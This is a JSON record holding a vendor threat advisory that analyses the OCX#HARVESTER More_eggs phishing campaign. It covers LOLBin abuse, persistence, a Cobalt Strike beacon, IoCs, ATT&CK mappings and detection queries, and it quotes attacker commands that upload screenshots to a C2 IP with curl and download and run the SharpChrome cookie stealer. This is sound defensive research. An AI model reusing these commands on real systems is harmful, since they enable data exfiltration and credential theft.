{ "id": "3c070982-0937-4a5d-b475-5c59ce914f6b", "created_at": "2026-04-06T00:14:44.618281Z", "updated_at": "2026-04-10T03:36:08.283959Z", "deleted_at": null, "sha1_hash": "0795455275faf6b5dfed815cbd61d40a6cd88595", "title": "Securonix Threat Labs Security Advisory: New OCX#HARVESTER Attack Campaign Leverages Modernized More_eggs Suite to Target Victims", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 10146549, "plain_text": "Securonix Threat Labs Security Advisory: New OCX#HARVESTER\r\nAttack Campaign Leverages Modernized More_eggs Suite to Target\r\nVictims\r\nArchived: 2026-04-05 21:35:50 UTC\r\nBy Securonix Threat Labs, Threat Research: Den Iuzvyk, Tim Peck, Oleg Kolesnikov\r\nTL;DR \r\nThe Securonix Threat Research team (STR) has recently observed a new attack campaign tracked by Securonix as\r\nOCX#HARVESTER. Some of the malicious payloads leveraged as part of the attack campaign observed appear to be\r\nrelated to the More_eggs malicious payloads reported earlier [1]. The naming of some of the collected samples as well as\r\nsome of the lure images suggest that the targets in this campaign are directly or indirectly related to the financial sector,\r\nespecially those involved in cryptocurrencies.\r\nThe payloads in this attack campaign were observed by STR in the wild mostly between December 2022 through March of\r\nthis year. There were multiple victims targeted and exploited by the attackers as part of the campaign.\r\nSome of our observations about this attack campaign and possible ways to detect it are described below. It is likely that at\r\nthis point the attacks continue along with new targets and malware delivery methods. We also observed that C2\r\ncommunication has shifted to a new infrastructure, which we will also dive into further down.\r\nAttack chain overview\r\nAs with most external attacks, phishing emails containing a malicious compressed zip file appears to be the primary\r\ndelivery method. The email attachment file analyzed by our team (screenshots-9201.jpg.zip) contains two shortcut files\r\n“Screenshot-9501.JPG.lnk” and “Screenshot-9502.JPG.lnk” disguised as jpeg. This particular lure method is quite\r\ncommon and was recently seen during the PY#RATION attack campaign discovered earlier this year. \r\nDiving in a bit deeper into the initial code execution from the two LNK files, we can see that the shortcut file links to\r\n“C:\\Windows\\System32\\cmd.exe” along with a large chunk of obfuscated command line.\r\n.LNK file execution\r\nThe two image lures take the appearance of a general image icon as it is pulled from the “Windows Image Resource” file\r\n(imageres.dll) which contains a library of icons for files and folders.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 1 of 21\n\nFigure 1: [OCX#HARVESTER] Shortcut .lnk file lure (Screenshot-9502.JPG.lnk)\r\nTaking a closer look at the two .lnk files, there is some obvious and apparent CMD obfuscation passed in as command line\r\nparameters along with the call to cmd.exe as seen in the figure below. \r\nFigure 2: [OCX#HARVESTER] Shortcut .lnk file analysis\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 2 of 21\n\nThe obfuscated command line performs a couple functions which sets the stage for binary file proxy execution. This is\r\ndone by using a common LOLbin technique which leverages the Windows binary file Ie4uinit.exe. First, it copies that file\r\nto the %tmp%\\ directory. Next, it creates a file in the same directory called ieuinit.inf. Most of the command line is\r\npopulating that file with the needed parameters to execute the next stage of the attack.\r\nFigure 3: [OCX#HARVESTER] Staging the Ie4uinit.exe LOLBin\r\nLOLBin usage: ie4uinit.exe\r\nIn summary, the Ie4uinit.exe LOLbin attack works by copying the Ie4uinit.exe executable out of the\r\nC:\\Windows\\System32\\ directory and placing it into a writable directory chosen by the attacker. In this case, the user’s\r\n%TMP% directory. By default this is typically C:\\Users\\user\\Appdata\\Local\\Temp\\. \r\nOnce copied, a new file is created within the same directory called ieuinit.inf. For the attack to work, this file contains a\r\ndirective which calls a section named “DefaultInstall.Windows7”. This then initiates [F07FD]  which is where we find the\r\nreference to the scrobj.dll/SCT payload (robots.php in our case). \r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 3 of 21\n\nFigure 4: [OCX#HARVESTER] – deobfuscated ieuinit.inf file\r\nThe next step is to execute the moved (or in some cases moved and renamed) binary Ie4uinit.exe and the required\r\ncommand line. In our case, START /min was utilized along with wmic process call create:\r\nstart  /MIN wmic process call create “%tmp%\\ie4uinit.exe -basesettings”\r\nWhen the above command is executed, the process ie4uinit.exe reads the contents of the local ieuinit.inf file. The\r\nreferenced scrobj.dll/SCT payload is downloaded and any embedded scripts will be executed on the system.\r\nLet’s next examine the contents of the robots.php file which will take us into the second stage of the attack.\r\nRobots.php(sct) \r\nAt this stage of the attack the attackers have achieved code execution and are looking to advance their foodhold. This is\r\nhistorically where TerraLoader comes into play within the More_eggs attack chain. Similar to what has been observed in\r\nthe past, TerraLoader is a heavily obfuscated JavaScript loader which allows for command and control (C2) functionality\r\non the affected host.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 4 of 21\n\nFigure 5: [OCX#HARVESTER] – robots.php obfuscation example\r\nIn this particular sample, the level of obfuscation is pretty extreme. As seen in the figure above, the script is full of\r\ncharacter substitution, randomly generated variables and broken apart strings. \r\nAfter deobfuscating the script, we’re able to better understand its capabilities. Some of these include:\r\nPersistence: Establish a registry foothold:\r\nActXobj1.RegWrite(“HKCU\\\\Environment\\\\UserInitMprLogonScript”, ‘cscript /b /e:jscript\r\n“%APPDATA%\\\\Microsoft\\\\’ + PersFileName + ‘”‘);\r\nEstablish connection to C2 server:\r\nConnectionLite.open(“GET”, “hxxp://95.179.186[.]167/Writer.php?deploy=” + CommandToRun, false);\r\nCommand execution using Msxsl.exe:\r\nCommandToRun = ‘cmd /c start /min “” “‘ + MsxslPath + ‘” “‘ + DropperPath + LoaderFileName + ‘”‘ + ‘ “‘ +\r\nDropperPath + LoaderFileName + ‘”‘;\r\nThe loader script shifts gears and starts to stage inside the %APPDATA%\\Microsoft\\ directory. Two new files are created:\r\n“ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt” and “QVB3WZXVQG6G8O7V.txt”. Both of these files serve a unique purpose\r\nand once again contain heavily obfuscated JavaScript code. \r\nvar DropperPath = WScriptShell.ExpandEnvironmentStrings(“%appdata%”);\r\nDropperPath = DropperPath + “\\\\Microsoft\\\\”;\r\nvar LoaderFileName = “ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt”;\r\nvar PersFileName = “QVB3WZXVQG6G8O7V.txt”;\r\nvar MsxslPath = DropperPath + gVKMduVwicY669(KngnfjMhu502, JYUyEnBGkSSrXUy905);\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 5 of 21\n\nLOLBin usage: msxsl.exe\r\nTo execute further stagers and maintain persistence, the Windows binary msxsl.exe is used to ensure script execution\r\nsuccess. This particular LOLBin allows the code to bypass application whitelisting restrictions such as AppLocker. Code\r\nsuch as JavaScript, VBscript, or JScript contained inside an expected .xsl file (or any XML formatted file) can be executed\r\nregardless of application restrictions.\r\nSimilar to that of the previous LOLbin example using ie4uinit.exe, msxsl.exe is executed from the attacker controlled\r\ndirectory in %APPDATA%\\Microsoft\\.\r\nBy default, msxsl.exe does not exist on most Windows operating systems. However, since the binary file is extremely\r\nlightweight, the entire msxsl.exe binary is compiled from raw hex values contained inside the robots.php script.\r\nFigure 6: [OCX#HARVESTER] – building the msxsl.exe binary from JavaScript (deobfuscated)\r\nThe written msxsl.exe binary, standing at a mere 24KB, appears to pass integrity checks and is digitally signed from\r\nMicrosoft Corporation. This file along with “ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt” and\r\n“QVB3WZXVQG6G8O7V.txt” are written to disk upon the execution of robots.php. \r\nFigure 7: [OCX#HARVESTER] – initial compromise infection process tree\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 6 of 21\n\nFigure 8: [OCX#HARVESTER] – built msxsl.exe binary details\r\nAs you’ll see, this LOLbin technique will be used quite often in the next stage of the attack.\r\nJScript Execution (ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt)\r\nThis phase of the attack is kicked off by robots.php using the following command:\r\nmsxsl.exe\r\n“C:\\Users\\redacted\\AppData\\Roaming\\Microsoft\\ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt”\r\n“C:\\Users\\redacted\\AppData\\Roaming\\Microsoft\\ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt”\r\nThis file, as per the current trend, is also heavily obfuscated in an attempt to circumvent detection engines. The obfuscation\r\nmethods in this particular file are very similar to what we saw in robots.php.\r\nTaking the time to deobfuscate the file gives us some insight into this stager’s capabilities.\r\nCommand and Control [T1071.001]\r\nC2 communication is established by creating a new ActiveXObject object and one of several XMLHTTP objects to\r\nestablish a connection to the attacker’s remote server. In this particular sample we observed the following URL being used:\r\nhxxps://telemistry[.]net/reg.php?g=\r\nhxxps://telemistry[.]net/get.php?g=\r\nConnections are established using a GET request which is sent along with some general host information such as user\r\nname, computer name, and domain. \r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 7 of 21\n\nFigure 9: [OCX#HARVESTER] – ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt: C2 connection strings\r\nExecution using WMI [T1047]\r\nCommands and other processes can also be executed using Windows Management Instrumentation (WMI) infrastructure. \r\nFigure 10: [OCX#HARVESTER] – ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt: WMI command execution\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 8 of 21\n\nLong sleeps [T1497.003]\r\nIn an effort to evade heuristic detection and as an anti-debugging measure, malware may incorporate long sleep times with\r\nseveral or all of its functions. This strain uses a separate function which executes the following command:\r\ntypeperf.exe “\\\\System\\\\Processor Queue Length” -si {sleep time in seconds} -sc 1\r\nThe usage of this particular functionality was seen with previous versions of Terraloader as well.\r\nFigure 11: [OCX#HARVESTER] – ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt: typeperf.exe execution\r\nThe function calling the command is leveraged heavily in the next section.\r\nMsxsl.exe execution [T1220]\r\nIn another effort to maintain persistence on the host, the script would leverage the msxsl.exe LOLbin to re-run this\r\nparticular script file and then sleep (using the typerf.exe method) every 120 seconds. This would ensure that C2\r\ncommunication would be reestablished during internet disconnects or by potential application crashes. \r\nAdditional functionality\r\nIn addition to some of the more prominent features discussed, the script contains additional functionality such as:\r\nFile read \r\nFile write\r\nExecute command (using WScript.Shell)\r\nAV enumeration\r\nJS execution (QVB3WZXVQG6G8O7V.txt)\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 9 of 21\n\nThis script is primarily for maintaining persistence on the host. If you recall it’s referenced by the registry modification\r\n“HKCU\\\\Environment\\\\UserInitMprLogonScript”. Like every other we’ve analyzed is also heavily obfuscated however\r\nonce translated into something human-readable it makes a bit more sense (figure x) \r\nFigure 12: [OCX#HARVESTER] -QVB3WZXVQG6G8O7V.txt: deobfuscated\r\nThis simple script leverages “Wscript.shell” to essentially use the msxsl.exe LOLbin to execute the contents of the main\r\nscript: ZUW0Y1NVRZ6LIIHFO2AQNHTX.txt.\r\nOCX#HARVESTER (DLL) binary file analysis\r\nThe next stage of the attack kicks off by downloading and executing a few different OCX#HARVESTER files. These are\r\nplaced in different directories around the system after being downloaded using curl. Regsvr32.exe is then used to register\r\nthe DLL payload. \r\nWe learn a couple things simply by examining the reference to the program database file (PDB) referenced in each of the\r\nOCX#HARVESTER files. First, it was compiled by a user account “David”,\r\nthough that doesn’t tell us much other than strengthen the fact these were all compiled by the same person. The folder\r\nstructure is similar to that of Visual Studio and each was compiled for a 64-bit CPU architecture.\r\nReferenced PDB File:  C:\\Users\\David\\source\\repos\\Rev\\x64\\Release\\Rev.pdb\r\nCamera.OCX#HARVESTER\r\nThis binary file was by far the smallest standing at only 177KB. The purpose of this binary appears to be quite simple as it\r\nappears to simply capture images of the user’s desktop. \r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 10 of 21\n\nFigure 13: [OCX#HARVESTER] – camera.OCX#HARVESTER PE info\r\nOnce captured, the image is saved to “C:\\Programdata\\test.png” and uploaded to the attacker’s C2 server using curl. In our\r\ncase we observed the following command:\r\n“c:\\windows\\system32\\cmd.exe” /v /c “curl -f “image=@c:\\programdata\\test.png” http://193.149.185.229/sas.php?\r\nname=REDACTED_HOSTNAME”\r\nNotice that the victim machine’s hostname is appended to the “name” php parameter.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 11 of 21\n\nFigure 14: [OCX#HARVESTER] – camera.OCX#HARVESTER supporting debug data\r\nFoonet.OCX#HARVESTER and bonet.OCX#HARVESTER\r\nThe binary file Foonet.OCX#HARVESTER and bonet.OCX#HARVESTER was also identified as a 64-bit PE executable\r\nmasquerading as a DLL file. Similar to the others this binary was also compiled in C++ using Visual Studio. Both were\r\nidentical file sizes and produced similar data when analyzed. \r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 12 of 21\n\nFigure 15: [OCX#HARVESTER] – Foonet.OCX#HARVESTER PE info\r\nThe purpose of these binary files is largely unknown. We did however observe it making an external connection to\r\n193.149.185[.]229 over port 1437. The binary file itself is heavily obfuscated making analysis difficult however, based on\r\nhigh level analysis of Foonet.OCX#HARVESTER, we were able to confirm the presence of the hard coded IP and port. \r\nFigure 16: [OCX#HARVESTER] – Foonet.OCX#HARVESTER supporting debug data: C2 IP/Port\r\nTunner.OCX#HARVESTER\r\nThis particular OCX#HARVESTER file was downloaded by the attackers however remained mostly unused, and aside\r\nfrom the web request record “hxxp://193.149.187[.]170/webdav/Tunner.OCX#HARVESTER” there was no indication of it\r\nbeing leveraged during any stage of the attack. \r\nThe file’s original name “MathATL.dll” is a bit smaller in size than the others at 271KB and also features counter-analysis\r\nand anti debugging characteristics. \r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 13 of 21\n\nFigure 17: [OCX#HARVESTER] – Tunner.OCX#HARVESTER PE info\r\nThings got a bit more interesting after analyzing the file a bit deeper. Hidden inside is a large XOR encoded block of text.\r\nFurther analysis revealed that this file is likely a Cobalt Strike beacon which connects using the “ukmedia.store/static-directory/html.mp3” directory, a common directory structure and even file extension for Cobalt Strike Arsenal payloads. \r\nThe user agent found in the shellcode is commonly used for default Cobalt Strike payloads which the attacker’s never\r\nbothered changing. (“User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36\r\n(KHTML, like Gecko) Chrome/62.0.3202”)\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 14 of 21\n\nFigure 18: [OCX#HARVESTER] – Tunner.OCX#HARVESTER Cobalt Strike implant shellcode\r\nC2 and infrastructure\r\nThe following IP addresses and domains were observed as a part of the overall C2 infrastructure during\r\n[OCX#HARVESTER] campaign.\r\nIP address Description\r\n95.179.201[.]171\r\n95.179.180[.]224\r\n172.86.75[.]75\r\nHost robots.php\r\n95.179.186[.]167 C2: /Writer.php\r\n95.179.170[.]76 C2: telemistry[.]net/get.php?id=xxxxxxx\r\n193.149.187[.]170 Host Tunner.OCX#HARVESTER\r\n193.149.185[.]229 C2 implant: port 1437\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 15 of 21\n\nFull URLs\r\nhxxp://95.179.201[.]171/robots.php\r\nhxxp://95.179.180[.]224/robots.php\r\nhttx://172.86.75[.]75/robots.php\r\nhxxp://95.179.186[.]167/Writer.php\r\nhxxp://193.149.185[.]229/sas.php\r\nukmedia[.]store/static-directory/html.mp3\r\nhxxp://193.149.185[.]229/api/SharpChrome.exe\r\nDNS activity\r\ntelemistry[.]net (95.179.170[.]76)\r\nukmedia[.]store\r\nwindowsupdatebg.s.llnwi[.]net\r\nSome observations regarding potential attribution\r\nHistorically, several MaaS customers have been sighted utilizing Golden Chickens. Probably the most famous of which is\r\nFIN6, which since 2018 has primarily targeted the financial sector. Others include the famous Cobalt Group from Russia\r\nand Evilnum out of Belarus. \r\nThe campaign which we observed starting in January this year began from a sample which originated from Turkey.\r\n(36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1)\r\nThe modus operandi of the More_eggs malware suite tracks with past activity seen historically. Some commonalities\r\nbetween prior versions and the latest include:\r\nObfuscated CMD in .lnk file using image lures\r\nStaging directory in %APPDATA\\Microsoft\\\r\nIe4uinit.exe LOLBin\r\nMsxsl.exe LOLBin\r\nPersistence through the registry key \\Environment\\UserInitMprLogonScript\r\nObfuscated JavaScript loader\r\nObfuscated JavaScript backdoor\r\nSimilar obfuscation techniques\r\nOCX#HARVESTER file execution through regsvr32.exe\r\nPost exploitation analysis and observations\r\nAfter gaining full access, the attackers attempted to download and run SharpChrome.exe downloaded and saved from one\r\nof the attacker’s C2 servers. The file was downloaded into the “%APPDATA\\Adobe\\” directory and saved BTaker.exe.\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 16 of 21\n\nSharpChrome is a version of SharpDPAPI which is designed to steal Chrome Cookies and login information. \r\nWe observed the attackers execute the following commands during the campaign:\r\nExecuted Commands\r\ndier (typo)\r\ndir\r\ntype update.js\r\ntype kohl.js\r\nnet user\r\nnet user /domain\r\ncmd /v /c “curl hxxp://193.149.185[.]229/api/SharpChrome.exe -o %appdata%\\Adobe\\BTaker.exe \u0026\u0026cd\r\n%appdata%\\Adobe\u0026\u0026 BTaker.exe”\r\ncd %appdata%\r\ncmd\r\nConclusion\r\nBased on what we observed as part of the OCX#HARVESTER attack campaign, it’s apparent that even recently, the\r\nMore_eggs suite of malware used as part of the attack campaign is continually being maintained and retooled in an attempt\r\nto circumvent detections. The Securonix Threat Research team will continue to monitor for changes and new attack vectors\r\nassociated with the attack campaign and the malware suite. Updates will be provided as needed. \r\nSecuronix recommendations and mitigations\r\nAvoid opening any attachments especially from those that are unexpected or are from outside the organization. Be\r\nextra vigilant with .zip, .iso, and .img attachments.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection\r\ncoverage\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below\r\nMITRE ATT\u0026CK Matrix\r\nTactic Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution T1204.002: User Execution: Malicious File\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 17 of 21\n\nTactic Technique\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nT1204.001: User Execution: Malicious Link\r\nDefense Evasion\r\nT1218.005: System Binary Proxy Execution: Mshta\r\nT1218.010: System Binary Proxy Execution: Regsvr32\r\nT1220: XSL Script Processing\r\nPersistence T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nCommand and\r\nControl\r\nT1573.001:  Encrypted Channel: Symmetric Cryptography\r\nT1071.001: Application Layer Protocol: Web ProtocolsT1105: Ingress Tool Transfer T1571:\r\nNon-Standard Port \r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nAnalyzed file hashes\r\nFile Name SHA256 (IoC)\r\nscreenshots-9201.jpg.zip 36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1\r\nAxiance_Full_Reports.zip 631f92c9147733acf3faa02586cd2a6cda673ec83c24252fccda1982cf3e96f6\r\nScreenshot-9501.JPG.lnk\r\nD496394abba570aa86abb4238cfa03762e3ccdb5c14920e3669ec2c1bb06321b\r\n36bf06bde63af8cdd673444edf64a323195fe962b3256e0269cdd7a89a7e2ae1\r\nScreenshot-9502.JPG.lnk\r\n13140291db39218c897d2ff960c1ef4ec3107bd239bc04ba8a218ad3b4dbd72f\r\n4ba964764210607f3bab884a14afa0b917891cff969a309bbbc12d3321386352\r\nScreenshot_0459159441.lnk bfe048ba91218019b64ab8477dad3ba6033cbc584f0d751d2866023b2b546c2e\r\nAxiance_FullReport_Volume.png.lnk d95e19341fa4af9a405f3a34fc3788dd9b74a9d6ab0f5cbe63cca5271ce63e05\r\nieuinit.inf\r\n7ac84bf51b9db169b1282bb40daae2d38bb2fa5acc02b590198815a79cee1dbf\r\n47e5232576e2eed33a13bca998c93e7aee57711f588b17f75367f7e58ea09ad9\r\n494839430932a97030a7163d636d2365d715ff517ba912f2afd0c557494d077a\r\nMathATL.dll debead9e8e3d106991e38d2057931265b3a08d4746c08255df0a4bf986327215\r\nrobots.php 7358d711f27086a21ce7485b1f1a570f0556f2c4096e22cac94a4b5d86842194\r\nBonet.OCX#HARVESTER 1e8c661f7496120d66aaca02def8c670f1bd656f0e9f4aefb5991bf214a48ffc\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 18 of 21\n\nFile Name SHA256 (IoC)\r\nCamera.OCX#HARVESTER\r\n(tollscamera.OCX#HARVESTER)\r\n1c9cd406024034cd69ac881801085b21864ec4148dd9cab6498cbd7ca77408bc\r\nFoonet.OCX#HARVESTER 5eee027839ce7f97976af005c04ff5d22316eacd2cd880b95f6bdb09ee84fd5c\r\nTunner.OCX#HARVESTER\r\n(MathATL.dll)\r\ndebead9e8e3d106991e38d2057931265b3a08d4746c08255df0a4bf986327215\r\nBtaker.exe (SharpChrome.exe) 1f03769fc692886f1dbdf2a2cfe7be50e6cbe94fb364ca4a0f501e88bd1ccb3\r\nZUW0Y1NVRZ6LIIHFO2AQNHTX.txt\r\nHU1NYTL2FCVX3JN63U0ASR1J3.txt\r\nb9c08b08d5a97c93db572fe67fcee129a41235182d9a6be8164058da0969ece9\r\nQVB3WZXVQG6G8O7V.txt 13275de2ee18d0b66772dec7ad5d1f2eb16875de8b33802793bcf4a5b41c7432\r\nKUCCGGD9PVKXKKRJUHN.txt 6e90de5bf00945252fcfc3746446b5d1037af59bed67e6e33de1a5dae9616bf9\r\nRelevant Securonix detection policies\r\nEDR-ALL-1171-ERR\r\nEDR-ALL-1204-RU\r\nEDR-ALL-225-RU\r\nWEL-ALL-1155-RU\r\nEDR-ALL-1169-RU\r\nEDR-ALL-993-RU\r\nEDR-ALL-1168-RU\r\nEDR-ALL-1193-RU\r\nRelevant Spotter queries\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction =\r\n“ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2”\r\nOR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace\r\nExecuted Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR\r\ndeviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “typeperf.exe” AND\r\nresourcecustomfield1 CONTAINS “\\system\\processor queue length” AND resourcecustomfield1 CONTAINS ” -si\r\n” AND resourcecustomfield1 CONTAINS ” -sc “\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction =\r\n“ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2”\r\nOR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace\r\nExecuted Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR\r\ndeviceaction = “Process Activity: Launched”) AND (destinationprocessname ENDS WITH “msxsl.exe” OR\r\nfilename = “msxsl.exe”) AND (resourcecustomfield8 CONTAINS “\\Appdata\\Local\\” OR resourcecustomfield8\r\nCONTAINS “\\Appdata\\Roaming\\” OR resourcecustomfield8 CONTAINS “\\ProgramData\\” OR\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 19 of 21\n\nresourcecustomfield8 CONTAINS “\\Users\\Public\\” OR filename = “msxsl.exe”) AND destinationprocessname\r\nNOT ENDS WITH “msxsl.exe”\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction =\r\n“ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2”\r\nOR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace\r\nExecuted Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR\r\ndeviceaction = “Process Activity: Launched”) AND (((destinationprocessname ENDS WITH “ie4uinit.exe” OR\r\nfilename = “IE4UINIT.EXE”) AND resourcecustomfield8 NOT CONTAINS “Windows\\System32” AND\r\nresourcecustomfield8 NOT CONTAINS “Windows\\SysWOW64”) OR (filename = “IE4UINIT.EXE” AND\r\ndestinationprocessname NOT ENDS WITH “ie4uinit.exe”))\r\nrg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction =\r\n“ProcessCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2”\r\nOR deviceaction = “SyntheticProcessRollUp2” OR deviceaction = “WmiCreateProcess” OR deviceaction = “Trace\r\nExecuted Process” OR deviceaction = “Process” OR deviceaction = “Childproc” OR deviceaction = “Procstart” OR\r\ndeviceaction = “Process Activity: Launched”) AND destinationprocessname ENDS WITH “wmic.exe” AND\r\nresourcecustomfield1 CONTAINS “process” AND resourcecustomfield1 CONTAINS “call” AND\r\nresourcecustomfield1 CONTAINS “create”\r\nrg_functionality = “Endpoint Management Systems” AND (destinationprocessname ENDS WITH “curl.exe” OR\r\ndestinationprocessname ENDS WITH “wget.exe”) AND (resourcecustomfield1 CONTAINS “.jpg” OR\r\nresourcecustomfield1 CONTAINS “.jpeg” OR resourcecustomfield1 CONTAINS “.png”) AND\r\n(resourcecustomfield1 CONTAINS “http://” OR resourcecustomfield1 CONTAINS “https://”)\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR\r\nrg_functionality = “Web Proxy”) AND (destinationaddress = “95.179.201[.]171” OR destinationaddress =\r\n“95.179.186[.]167” OR destinationaddress = “95.179.170[.]76” OR destinationaddress = “193.149.187[.]170” OR\r\ndestinationaddress = “193.149.185[.]229”)\r\nReferences:\r\n[1] More_eggs, Anyone? Threat Actor ITG08 Strikes Again\r\nhttps://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/\r\n[2] Latest Golden Chickens MaaS Tools Updates and Observed Attacks\r\nhttps://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/\r\n[3]LOLBas Project: Ie4uinit.exe\r\nhttps://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\r\n[4] LOLBas Project: msxsl.exe\r\nhttps://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/\r\n[5] GitHub: GhostPack – SharpDPAPI#sharpchrome\r\nhttps://github.com/GhostPack/SharpDPAPI#sharpchrome\r\n[6] Hackers Spearphish Professionals on LinkedIn with Fake Job Offers, Infecting them with Malware, Warns assenter\r\nhttps://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 20 of 21\n\nSource: https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nhttps://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/\r\nPage 21 of 21\n\n95.179.170[.]76 193.149.187[.]170 C2: Host telemistry[.]net/get.php?id=xxxxxxx Tunner.OCX#HARVESTER \n193.149.185[.]229 C2 implant: port 1437\n Page 15 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/" ], "report_names": [ "threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite" ], "threat_actors": [ { "id": "059b16f8-d4e0-4399-9add-18101a2fd298", "created_at": "2022-10-25T15:50:23.29434Z", "updated_at": "2026-04-10T02:00:05.380938Z", "deleted_at": null, "main_name": "Evilnum", "aliases": [ "Evilnum" ], "source_name": "MITRE:Evilnum", "tools": [ "More_eggs", "EVILNUM", "LaZagne" ], "source_id": "MITRE", "reports": null }, { "id": "12517c87-040a-4627-a3df-86ca95e5c13f", "created_at": "2022-10-25T16:07:23.61665Z", "updated_at": "2026-04-10T02:00:04.689Z", "deleted_at": null, "main_name": "FIN6", "aliases": [ "ATK 88", "Camouflage Tempest", "FIN6", "G0037", "Gold Franklin", "ITG08", "Skeleton Spider", "Storm-0538", "TAAL", "TAG-CR2", "White Giant" ], "source_name": 